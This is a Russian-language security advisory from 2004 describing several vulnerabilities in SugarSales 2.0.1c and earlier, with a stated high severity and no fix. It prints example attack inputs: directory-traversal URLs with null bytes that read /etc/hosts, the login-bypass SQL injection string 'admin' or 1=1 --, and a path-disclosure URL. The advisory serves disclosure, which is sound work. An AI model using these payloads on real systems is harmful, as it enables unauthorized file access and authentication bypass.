SQL-инъекция и обход каталога в SugarSales

Дата публикации:
17.12.2004
Всего просмотров:
941
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: SugarSales 2.0.1с и более ранние версии

Описание:
Обнаружено несколько уязвимостей в SugarSales. Удаленный атакующий может просмотреть произвольные файлы на системе, выполнить SQL-инъекцию и определить установочную директорию на системе.

1. Удаленный атакующий может с помощью специально сформированного URL просмотреть произвольные файлы на уязвимой системе с привилегиями целевого web сервера. Примеры (первые 2 примера требую аторизацию):

http://[target]/Sugarcrm/index.php?module=/../../etc/hosts%00&action=EditView
http://[target]/Sugarcrm/index.php?module=Calls%00&action= /../../etc/hosts%00
http://[target]/sugarcrm/modules/Users/Login.php?theme=/../../../etc/hosts%00
http://[target]/sugarcrm/modules/Calls/index.php?theme=/../../../etc/h osts%00

2. После инсталляции программное обеспечение не удаляет установочные файлы и не запрещает к ним доступ. Удаленный атакующий может обратиться к этим сценариям и вызвать отказ в обслуживании или получить пароль на доступ к MySQL.

3. Удаленный атакующий может выполнить SQL-инъекцию с помощью специально сформированного URL во время аутентификации. (Эта уязвимость была исправлена в версии 2.0.1a). Пример:

admin' or 1=1 --

4. Удаленный атакующий может вызвать некоторые сценарии и получить данные об установочной директории на системе. Пример:

http://[target]/Sugarcrm/phprint.php?jt=fe3e158b220567409e5d8976d34bcdae &module=&action=&record =&lang=de

URL производителя: www.sugarcrm.com

Решение: Решение не существует на данный момент

Ссылки: SugarSales Multiple Vulnerabilities

или введите имя

CAPTCHA